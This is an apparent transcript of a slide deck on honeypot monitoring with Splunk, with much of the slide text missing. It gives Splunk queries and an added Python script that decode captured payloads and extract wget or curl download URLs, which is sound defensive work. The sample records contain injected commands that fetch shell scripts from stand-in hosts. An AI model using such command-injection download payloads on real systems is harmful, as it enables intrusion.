Honeypot Monitoring with Splunk (Splunkによるハニーポット監視.pdf)
sec-chick
September 30, 2018
Transcript
SPLUNK / SEC-CHICK
WHO AM I • sec-chick (@one_sec_chick) • PSOC • honeypots (WoW Honeypot, Honeytrap)
[diagram residue: Splunk, WoWHoneypot, Honeytrap, PC, VPS, SSH]
SPLUNK • Splunk [slide text unrecoverable]
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html
• WoWHoneypot
• Honeytrap
Steps (step text unrecoverable): 1. SSH 2. Splunk 3. Splunk 4. 5. HEX
Attack_connection.local_port 10
Attack_connection.payload.data_hex: Hex → decoded
1. Docker 2. [unrecoverable] 3. Splunk 4. Suricata
DOCKER • Docker [slide text unrecoverable] • cron → Splunk
[diagram residue: WoWHoneypot and Honeytrap in Docker on the VPS (Honeypot); Splunk]
SPLUNK • Splunk • DECRYPT • → Grep • → URL → VirusTotal [slide text otherwise unrecoverable]
WOWHONEYPOT
| rex field=_raw "\"(?<Method_wow>[^\s]+)\s(?<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
| decrypt field="base64_wow" atob emit('base64_wow_decrypted')
| eval decode=urldecode(base64_wow_decrypted)
| rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[\w/:\.\-]+?)\s"
| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[\w/:\.\-]+?)\s"
HONEYTRAP
| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[\w/:\.\-]+?)\s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[\w/:\.\-]+?)\s"
HONEYTRAP
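The same decode chain as an offline Python script, added here as an example and not code from the deck or from the WoWHoneypot/Honeytrap projects: it mirrors the rex, decrypt (atob/unhex), urldecode and URL-extraction steps above, assumes the access-log line has the field order the deck's rex expects, and uses constructed sample records with documentation addresses.

```python
import base64
import re
from urllib.parse import unquote

# Same field layout the deck's rex uses on a WoWHoneypot access-log line:
# quoted method and path, three more space-separated tokens, then the base64 request.
WOW_RE = re.compile(r'"(?P<method>\S+)\s(?P<path>\S+)\s\S+\s\S+\s\S+\s(?P<b64>\S+)\s*$')
# URL following a wget/curl, same character class as the deck's rex; finditer lists every one.
URL_RE = re.compile(r'(?:wget|curl)\b.*?(?P<url>https?://[\w/:.\-]+)')


def extract_download_urls(text):
    """Return every wget/curl download URL found in a decoded payload."""
    return [m.group('url') for m in URL_RE.finditer(text)]


def decode_wowhoneypot(line):
    """base64 -> text -> urldecode, as the deck's decrypt/eval/rex chain does."""
    m = WOW_RE.search(line)
    if not m:
        return None
    try:
        request = base64.b64decode(m.group('b64'), validate=True).decode('utf-8', 'replace')
    except ValueError:          # binascii.Error is a ValueError: not valid base64
        return None
    decoded = unquote(request)  # mirrors eval decode=urldecode(...)
    return {'method': m.group('method'), 'path': m.group('path'),
            'request': decoded, 'urls': extract_download_urls(decoded)}


def decode_honeytrap(data_hex):
    """unhex attack_connection.payload.data_hex and pull URLs from the result."""
    try:
        payload = bytes.fromhex(data_hex).decode('utf-8', 'replace')
    except ValueError:          # odd length or non-hex characters
        return None
    return {'payload': payload, 'urls': extract_download_urls(payload)}


# Constructed samples (documentation addresses, not real captures), encoded here
# so the script runs offline; real records would come from the honeypot containers.
SAMPLE_REQUEST = ("POST /cgi-bin/test HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
                  "cmd=wget%20http%3A%2F%2F198.51.100.7%2Fupdate.sh")
SAMPLE_WOW_LINE = ('[2018-09-30 12:00:00+0900] 203.0.113.5 51234 "POST /cgi-bin/test HTTP/1.1" 1 0 '
                   + base64.b64encode(SAMPLE_REQUEST.encode()).decode())
SAMPLE_HT_HEX = "GET /setup.cgi?cmd=curl%20http://203.0.113.9/a.sh HTTP/1.1\r\n".encode().hex()

if __name__ == '__main__':
    print(decode_wowhoneypot(SAMPLE_WOW_LINE))
    print(decode_honeytrap(SAMPLE_HT_HEX))
```

Unlike the deck's rex, which keeps one URL per wget or curl field, finditer returns every download URL in the payload, and malformed base64 or hex yields None instead of a partial record.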
SURICATA • Grep • → ./ • Suricata [slide text unrecoverable]
• @Sec_S_Owl • @cactus_pots • @SugitaMuchi • @soji256 • @morihi_soc • Twitter • Slack • http://goo.gl/8bLkZA
• Splunk [closing slide text unrecoverable]